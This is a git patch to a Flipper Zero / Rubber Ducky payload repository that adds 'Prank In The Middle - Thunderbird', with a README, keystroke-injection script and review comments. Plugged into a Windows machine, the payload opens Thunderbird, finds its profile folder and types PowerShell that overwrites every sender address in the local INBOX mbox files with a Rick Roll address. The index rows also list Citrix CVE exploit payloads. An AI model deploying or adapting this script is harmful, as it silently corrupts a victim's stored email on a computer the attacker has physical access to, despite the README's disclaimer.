From 272beea6d98ef90b15a45d2a1a26071a43d7bf62 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 3 Jun 2024 11:59:02 +0200 Subject: [PATCH] Prank In The Middle - Thunderbird The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank. --- README.md | 10 +- .../Prank_In_The_Middle_Thunderbird/README.md | 95 +++++++++++++++ .../payload.txt | 113 ++++++++++++++++++ Windows/README.md | 1 + 4 files changed, 215 insertions(+), 4 deletions(-) create mode 100644 Windows/Prank/Prank_In_The_Middle_Thunderbird/README.md create mode 100644 Windows/Prank/Prank_In_The_Middle_Thunderbird/payload.txt diff --git a/README.md b/README.md index 0c46d17..4239184 100644 --- a/README.md +++ b/README.md @@ -31,12 +31,13 @@ |Type|Count| |--|--| -|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|29| -|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|44| +|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|30| +|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|45| |![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|4| |![macOS](https://img.shields.io/badge/mac%20os-000000?style=for-the-badge&logo=macos&logoColor=F0F0F0)|0 [Buy me a Mac](https://github.com/sponsors/aleff-github?frequency=one-time&sponsor=aleff-github) :-)| -|**Tot**|77| -|Hak5|41| +|**Tot**|79| +|Hak5 Payload accepted|111| +|Hak5 Payload Awarded|2| ## Payloads 
@@ -117,6 +118,7 @@ |![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|Prank|[Delete A Reminder With An iPhone](https://github.com/aleff-github/my-flipper-shits/tree/main/iOS/Prank/Delete_A_Reminder_With_An_iPhone)|🟑| |![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[(Kali Linux) This_damn_shell_doesn_t_work___so_sad!](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-KALI)|🟒| |![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[(Linux) This_damn_shell_doesn_t_work___so_sad!](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-LINUX)|🟒| +|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Prank In The Middle - Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Prank_In_The_Middle_Thunderbird)|🟒| |![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Indicent Response|[Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Incident_Response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE)|πŸ”΄| |![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Indicent Response|[Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)|πŸ”΄| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Indicent Response|[Exploit Citrix NetScaler ADC and Gateway through 
CVE-2023-4966](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)|πŸ”΄| diff --git a/Windows/Prank/Prank_In_The_Middle_Thunderbird/README.md b/Windows/Prank/Prank_In_The_Middle_Thunderbird/README.md new file mode 100644 index 0000000..a569d26 --- /dev/null +++ b/Windows/Prank/Prank_In_The_Middle_Thunderbird/README.md 
@@ -0,0 +1,95 @@ +# Prank In The Middle - Thunderbird + +The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank. + +**Category**: Prank + +**Plug-And-Play** ^^ + +## Index + +- [Description](#description) +- [Requirements](#requirements) +- [How the Program Works](#how-the-program-works) +- [Code Details](#code-details) + - [System Detection && Short Start DELAY](#system-detection--short-start-delay) + - [Navigating in Thunderbird](#navigating-in-thunderbird) + - [Opening PowerShell and Email Manipulation](#opening-powershell-and-email-manipulation) + - [The Regex](#the-regex) +- [Notes](#notes) +- [Credits](#credits) + +## Description + +This program automates a series of actions on a Windows system (*tested on Windows 10 but should works in Windows 11*) to manipulate the contents of emails found in a Thunderbird profile. Specifically, it identifies emails in the `INBOX` file of each configured email account and replaces the sender's email addresses with a fictitious address `Rick.Roll@tinyurl.com/prinkrollme` where `prinkrollme` is the union of the words `Prank`, `Rick Roll` and `Me` (*this one was necessary becouse prinkwoll era giΓ  stato preso* **:c** *so sad...* ) all compressed into the link `tinyurl.com/prinkrollme` ([*3Β° note*](#notes)) that redirect to the YouTube video `https://www.youtube.com/watch?v=xMHJGd3wwZk`. + +![](https://i.ibb.co/VJjfbkJ/1.png) + +## Requirements + +- A Windows system with Thunderbird installed. +- Access to PowerShell. +- Permissions to run code in Powershell + +## Test Environment + +- Thunderbird 115.11.1 (64 bit) +- Windows 10 Pro + +## How the Program Works + +1. **System Detection:** The program detects if the system reflects the CAPSLOCK state and sets a dynamic delay based on this. +2. 
**Opening Thunderbird:** Uses a series of commands to open Thunderbird and navigate to the profile folder settings. +3. **Copying the Profile Folder Path:** Copies the profile folder path to the clipboard. +4. **Opening PowerShell:** Opens a PowerShell window and navigates to the `ImapMail` folder of the Thunderbird profile. +5. **Email Manipulation:** Uses PowerShell to: + - Find all `INBOX` folders within `ImapMail`. + - Read the contents of the emails in `INBOX`. + - Replace the sender addresses with `Rick Roll `. + - Save the modified content back to the original email files. + +## Code Details + +For reasons of space, the code is not given in the documentation. However, comments can be found that broadly explain the piece of code that is executed following the comment itself. + +### The Regex + +The regex was not created from scratch but was taken from the discussion β€œ[How can I validate an email address using a regular expression?](https://stackoverflow.com/questions/201323/how-can-i-validate-an-email-address-using-a-regular-expression)” posted on **StackOverflow**. + +```plaintext +(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\]) +``` + +The only difference is the addition of `**From: <...>**` which reduces to just the email addresses that sent the emails and not all addresses detected in the file that might depict other references + +```plaintext +From:\s.*\s<...> +``` + +## Notes + +1) This program was created for educational and demonstrative purposes. Unauthorized alteration of emails is illegal, and violating others' privacy is a crime. 
+2) Ensure you have the necessary permissions before running any script that modifies personal or sensitive data. +3) Considering [Staged Payloads](https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#staged-payloads), generally, it is not possible to include code that downloads from external sources. In this case, however, the setup involves a redirect to a YouTube video, which has been conveniently shortened using `tiny.url`. It is important to note that this redirect can be modified, and I strongly recommend changing it to a personal link for your security. While I assure you that I will never alter the link, no one can guarantee that I won't be compromised, allowing someone else to alter the redirect. It is always advisable and a good practice to never use links found online without understanding the actual redirect and replacing it with your own link. + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github +
+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/Windows/Prank/Prank_In_The_Middle_Thunderbird/payload.txt b/Windows/Prank/Prank_In_The_Middle_Thunderbird/payload.txt new file mode 100644 index 0000000..1971303 --- /dev/null +++ b/Windows/Prank/Prank_In_The_Middle_Thunderbird/payload.txt 
@@ -0,0 +1,113 @@ +REM ##################################################### +REM # # +REM # Title : Prank In The Middle - Thunderbird # +REM # Author : Aleff # +REM # Version : 1.0 # +REM # Category : Prank # +REM # Target : Windows 10/11 # +REM # # +REM ##################################################### + +REM Open Thunderbird and goto settings +WIN r +STRING thunderbird +ENTER +DELAY 1000 +REPEAT 4 TAB +ENTER +DELAY 500 +REPEAT 2 UPARROW +ENTER +DELAY 500 +REPEAT 3 UPARROW +ENTER +DELAY 500 + +REM Goto profile directory +REPEAT 11 TAB +ENTER +DELAY 500 + +REM Copy the directory path +REPEAT 4 TAB +DELAY 500 +SPACEBAR +DELAY 500 +ENTER +DELAY 500 +CTRL c +DELAY 500 +ALT F4 +DELAY 500 + +REM Open the powershell and goto the directory +WIN r +STRING powershell +ENTER +DELAY 1500 +STRING cd +DELAY 500 +CTRL v +DELAY 500 +ENTER +DELAY 500 + +REM Get the INBOX content and edit it overwriting. Then close the powershell +STRING cd ImapMail +ENTER +DELAY 500 +STRING $directories = Get-ChildItem -Directory | Select-Object FullName +ENTER +DELAY 500 +STRING foreach ($dir in $directories) { +ENTER +DELAY 500 +STRING # Replace backslashes with slash +ENTER +DELAY 500 +STRING $newPath = $dir.FullName -replace '\\', '/' +ENTER +DELAY 500 +STRING # Add the sub-string β€œ/INBOX” to the end +ENTER +DELAY 500 +STRING $newPath += "/INBOX" +ENTER +DELAY 500 +STRING # Check whether the INBOX file exists +ENTER +DELAY 500 +STRING if (Test-Path $newPath) { +ENTER +DELAY 500 +STRING # Check whether the INBOX file exists +ENTER +DELAY 500 +STRING $emails = Get-Content -Path $newPath -Raw +ENTER +DELAY 500 +STRING # Replace email sender with Rick Roll! 
+ENTER +DELAY 500 +STRING # The following operation is simplified and assumes that the sender starts with β€œFrom: ...” +ENTER +DELAY 500 +STRING # and does not contain complex MIME structures +ENTER +DELAY 500 +STRING $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll " +ENTER +DELAY 500 +STRING # Write the modified content into the INBOX file. +ENTER +DELAY 500 +STRING Set-Content -Path $newPath -Value $modifiedEmails -Force +ENTER +DELAY 500 +STRING } +ENTER +DELAY 500 +STRING } +ENTER +DELAY 1000 +ALT F4 \ No newline at end of file diff --git a/Windows/README.md b/Windows/README.md index 60627ac..51250fd 100644 --- a/Windows/README.md +++ b/Windows/README.md 
@@ -73,6 +73,7 @@ |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Pranh(ex)](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Pranh(ex))|🟒| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Send Email Through Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/SendEmailThroughThunderbird)|🟒| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Change Github Profile Settings](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Change_Github_Profile_Settings)|🟑| +|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Prank In The Middle - Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Prank_In_The_Middle_Thunderbird)|🟒| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Incident Response|[Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_Remote_Code_Execution_Vulnerability)|🟒| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Indicent Response|[Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)|πŸ”΄| |//|Prank|[Flipper Zero GIF](img/gif)|🟒|
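Review bot: in the first README.md hunk (`@@ -31,12 +31,13 @@`), the Hak5 row changes from `|Hak5|41|` to `|Hak5 Payload accepted|111|` in a commit that adds a single payload, while every per-OS row moves by exactly one; please confirm 111 is the intended figure and not a typo, and consider saying in the column label what "accepted" and "Awarded" count so the table stays self-explanatory.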
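Review bot: in the second README.md hunk (`@@ -117,6 +118,7 @@`), the added row is fine, but the three context rows immediately below it read `Indicent Response` instead of `Incident Response`; since that column is the category used for grouping, it is worth fixing those in this PR or a follow-up.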
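Review bot: in the new `Windows/Prank/Prank_In_The_Middle_Thunderbird/README.md`, the Index links to three Code Details subsections (`System Detection && Short Start DELAY`, `Navigating in Thunderbird`, `Opening PowerShell and Email Manipulation`) that do not exist in the file, only `The Regex` does, and the `Test Environment` section is missing from the Index; either add the sections or trim the Index. Step 1 of "How the Program Works" also describes CAPSLOCK-based system detection with a dynamic delay, but `payload.txt` in this same patch uses fixed `DELAY` values and contains no such detection, so that step should be dropped or the payload updated to match. Minor wording: `should works` -> `should work`, `becouse` -> `because`, `Powershell` -> `PowerShell`.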
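Review bot: in `payload.txt`, the `INBOX` mbox files are rewritten while Thunderbird is still running: the `ALT F4` after `CTRL c` closes only the profile-folder window opened from Settings, so Thunderbird keeps the mailbox open and its `.msf` index is not updated, meaning the edited senders may not appear until the folder index is rebuilt, or the write may fail if the file is locked; consider closing Thunderbird before the PowerShell block. The rewrite itself uses `Get-Content -Raw` followed by `Set-Content -Force` with no `-Encoding` or `-NoNewline`, which on the Windows PowerShell 5.1 that ships with the tested Windows 10 appends a trailing newline and re-encodes the file with the default ANSI code page, so non-ASCII message bodies may not round-trip intact. Two small things in the typed script: the comment `# Check whether the INBOX file exists` is typed twice and the second copy sits above `Get-Content`, where it should describe reading the file; and the backtick inside the character class `` [a-z0-9!#$%&'*+/=?^_`{|}~-] `` is consumed by PowerShell as the escape character of the double-quoted string, so a literal backtick in a local part is not matched, which is harmless but differs from the regex shown in the README.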